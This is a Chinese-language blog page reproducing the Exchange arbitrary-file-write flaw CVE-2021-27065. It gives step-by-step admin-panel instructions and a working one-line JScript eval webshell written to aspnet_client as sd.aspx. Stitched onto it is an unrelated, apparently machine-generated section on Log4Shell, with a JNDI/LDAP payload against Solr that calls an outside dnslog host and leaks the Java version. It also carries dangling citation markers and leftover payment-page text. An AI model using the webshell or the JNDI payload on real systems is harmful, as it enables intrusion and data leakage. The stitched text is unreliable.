CVE-2021–27065漏洞分析及复现

本文描述了CVE-2021-27065漏洞如何被利用,攻击者通过管理员权限在OAB配置中插入恶意shell脚本,实现对服务器的任意文件写入,展示了相关安全威胁和防御措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

接着昨天的说

CVE-2021–27065

CVE-2021–27065是⼀个任意⽂件写⼊漏洞,它需要登陆的管理员账号权限才能触发。而CVE-2021–26855正好可以为我们提供了管理员账号权限。

登录管理员账号后,进入:服务器——>虚拟目录——>OAB

编辑OAB配置,在外部链接中写⼊shell并保存。

http://aaa/<script language="JScript" runat="server">function Page_Load(){eval(Request["SD"],"unsafe");}</script>

保存后选择重置虚拟目录 写下shell位置为:\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\sd.aspx

查看shell文件,写入了一句话木马。

### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目提供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载权限、启用严格的输入校验机制等手段进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值